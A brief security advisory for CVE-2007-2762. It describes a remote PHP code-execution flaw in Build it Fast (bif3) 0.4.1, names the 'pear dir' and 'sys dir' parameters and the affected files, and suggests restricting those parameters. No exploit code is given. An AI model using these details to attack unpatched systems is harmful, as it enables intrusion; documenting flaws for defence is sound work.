CVE-2007-2762

Name of the Vulnerable Software and Affected Versions Build it Fast (bif3) version 0.4.1

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the pear dir parameter to Base/Application.php, or the sys dir parameter to various PHP files in the Widgets/Base/ directory, including Footer.php, widget.BifContainer.php, widget.BifRoot.php, widget.BifRoot2.php, widget.BifRoot3.php, and widget.BifWarning.php.

Recommendations For Build it Fast (bif3) version 0.4.1, consider restricting access to the pear dir and sys dir parameters in the affected PHP files until a patch is available. As a temporary workaround, avoid using the pear dir parameter in the Base/Application.php file and the sys dir parameter in the Footer.php, widget.BifContainer.php, widget.BifRoot.php, widget.BifRoot2.php, widget.BifRoot3.php, and widget.BifWarning.php files in the Widgets/Base/ directory.